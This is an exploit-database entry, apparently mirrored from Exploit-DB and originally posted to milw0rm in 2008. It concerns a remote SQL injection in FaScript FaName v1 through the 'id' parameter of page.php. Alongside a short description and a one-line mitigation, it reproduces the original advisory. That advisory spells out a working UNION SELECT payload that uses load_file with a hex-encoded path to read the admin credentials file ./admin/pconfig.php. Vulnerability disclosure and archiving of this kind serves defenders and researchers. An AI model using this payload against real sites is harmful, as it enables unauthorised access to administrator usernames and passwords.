FaScript FaName v1 Remote Sql Injection

vendor:

FaName

by:

IRCRASH (Dr.Crash)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: FaName

Affected Version From: v1

Affected Version To: v1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

FaScript FaName v1 Remote Sql Injection

A vulnerability exists in FaScript FaName v1 which allows an attacker to remotely inject arbitrary SQL commands. The vulnerability is due to the 'id' parameter in 'page.php' not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable script. This can allow the attacker to gain access to the administrator's username and password which is stored in './admin/pconfig.php' file.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL server.

Source

Exploit-DB raw data:

#####################################################################################
####                FaScript FaName v1 Remote Sql Injection                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://www.hotscripts.com/Detailed/66472.html                    #
#                                                                                   #
#Injection Adress :  http://Sitename/faname/page.php?id=<SqL Code>                  #
#                                                                                   #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php      #
#       You can open this file with load_file Function in mysql and see admin       #
#       Username and password in Page Source                                        #
#                                                                                   #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870            #
#                                                                                   #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3/**/from/**/mysql.user/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-15]